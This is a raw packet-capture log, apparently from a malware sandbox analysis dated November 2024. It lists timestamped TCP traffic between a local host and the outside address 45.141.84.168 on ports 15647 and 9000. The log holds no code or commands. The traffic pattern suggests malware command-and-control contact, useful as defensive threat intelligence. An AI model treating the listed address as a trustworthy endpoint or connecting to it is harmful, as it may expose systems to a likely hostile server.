                                          Nov 28, 2024 13:40:27.182463884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.196974039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.197109938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.200794935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.212074995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.212249994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.221661091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.221743107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.224808931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.224869013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.229423046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.229446888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.229480982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.240264893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.240447998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.243056059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.243083000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.243141890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.261840105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.261955023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.274070024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.274154902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.282211065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.282461882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.288403988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.288474083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.288538933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.298814058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.298896074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.314610004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.314735889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.314763069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.317059040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.317116022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.326843023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.327209949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.334460020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.334518909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.345221043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.345487118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.347371101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.347434044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.347507000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.360379934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.360443115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.370436907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.370544910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.370637894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.372988939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.373261929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.373328924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.382299900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.382386923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.400743008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.400820017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.409409046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.413412094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.413491011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.413553953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.426063061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.426142931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.438294888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.438364983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.441528082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.441595078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.455115080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.455215931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.465688944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.465756893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.467047930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.467117071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.471889019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.471991062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.475481033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.475545883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.491740942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.494168997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.494456053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.506588936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.506655931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.515779018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.515822887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.515836954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.522221088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.522258997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.522443056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.534050941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.534168005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.543589115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.543632984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.558322906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.558339119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.558410883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.564874887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.566236973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.571528912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.571604013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.571609974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.592593908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.596590042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.596688032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.596716881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.597961903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.605165958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.605206966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.605283022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.616179943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.616250038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.618257046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.618349075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.618392944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.631819010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.633007050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.635094881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.635246992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.635307074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.647977114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.648636103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.656500101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.660454035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.670073032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.670300007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.670408010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.673726082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.678175926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.685939074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.685956955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.686189890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.693231106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.696846962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.707993031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.708241940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.708365917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.713031054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.713218927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.713262081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.713290930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.725449085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.728207111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.731367111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.731406927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.731481075 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.738487959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.740396976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.744790077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.744858980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.753108978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.757549047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.757559061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.757565022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.757601976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.757635117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.772874117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.772958994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.773049116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.781029940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.789057970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.799864054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.799999952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.810108900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.810183048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.810269117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.817687035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.822196960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.830972910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.833312988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.833364010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.833378077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.849369049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.850189924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.850414991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.859549046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.860337019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.864792109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.864870071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.867104053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.867170095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.888130903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.889341116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.894202948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.909347057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.914285898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.914441109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.914536953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.922451973 CET90004983445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.922543049 CET90004983445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.922755957 CET498349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.922826052 CET498349000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.930224895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.933717966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.934253931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.934396982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.934520006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.953294039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.954087973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.954281092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.954282045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.967737913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.970459938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.970556974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.980678082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.982357025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.982408047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.982446909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:27.987238884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:27.990211964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.001259089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.003622055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.008346081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.014246941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.018794060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.018826962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.018928051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.029550076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.032223940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.032632113 CET498399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.037245035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.039387941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.042762995 CET90004983445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.051470995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.051629066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.053821087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.053880930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.061721087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.061767101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.061938047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.079030991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.079118013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.089247942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.089348078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.100718975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.101181984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.104974985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.105041981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.105091095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.105142117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.107608080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.107763052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.110430956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.111211061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.115287066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.127914906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.127957106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.128063917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.129921913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.129982948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.138921976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.139005899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.152257919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.152271986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.152353048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.152548075 CET90004983945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.152616024 CET498399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.153959036 CET498399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.155468941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.155522108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.171592951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.171700954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.171731949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.171782970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.171802044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.171869993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.182142019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.182230949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.186295033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.186347961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.186436892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.205564976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.205607891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.205678940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.221199036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.222878933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.230735064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.232434034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.248049021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.248116016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.259206057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.261254072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.274768114 CET90004983945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.275038004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.276158094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.278193951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.280411005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.282255888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.290596962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.290682077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.290714979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.302018881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.302097082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.307491064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.307549953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.308379889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.308574915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.327207088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.328843117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.328974009 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.343071938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.343075037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.344252110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.350187063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.350254059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.350322008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.368016958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.368211985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.372915030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.372960091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.373044014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.373044014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.373044014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.375118017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.378361940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.383361101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.386152983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.395113945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.398298025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.401056051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.404452085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.406574011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.406635046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.420867920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.420923948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.421116114 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.426433086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.428303003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.444551945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.444622040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.444844007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.447299957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.447434902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.463100910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.463169098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.464262009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.464323044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.474539995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.474601030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.474625111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.488215923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.488342047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.489317894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.489363909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.489397049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.498430967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.498506069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.504544020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.504622936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.518290043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.518374920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.520207882 CET156474973045.141.84.168192.168.2.4
